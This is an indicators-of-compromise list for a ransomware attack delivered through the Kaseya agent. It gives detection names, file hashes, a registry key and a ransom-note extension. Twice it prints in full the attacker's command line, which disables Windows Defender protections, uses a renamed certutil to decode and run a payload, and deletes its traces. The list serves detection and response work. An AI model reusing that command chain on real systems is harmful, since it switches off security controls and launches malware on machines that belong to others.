Indicators of Compromise (IoC)

Sophos detections:
Troj/Ransom-GIP
Troj/Ransom-GIQ
HPmal/Sodino-A (detected in C:\Windows\MsMpEng.exe)
DynamicShellcode (hmpa.exploit.prevented.1)
Cryptoguard (cryptoguard.file.detected.1)

MS-Windows processes involved:

"C:\WINDOWS\system32\cmd.exe" /c ping 127.0.0.1 -n 6258 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe
Parent Path - C:\Program Files (x86)\Kaseya\\AgentMon.exe

"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 -n 5693 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe
Parent Path - C:\Program Files (x86)\Kaseya\\AgentMon.exe

Files involved (path and hash):
C:\windows\cert.exe  36a71c6ac77db619e18f701be47d79306459ff1550b0c92da47b8c46e2ec0752
C:\windows\msmpeng.exe  33bc14d231a4afaa18f06513766d5f69d8b88f1e697cd127d24fb4b72ad44c7a
C:\kworking\agent.crt
C:\Windows\mpsvc.dll  8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd
C:\kworking\agent.exe  d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e

Registry keys:
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\BlackLivesMatter

Possible ransomware extension: -readme.txt

Detected domains: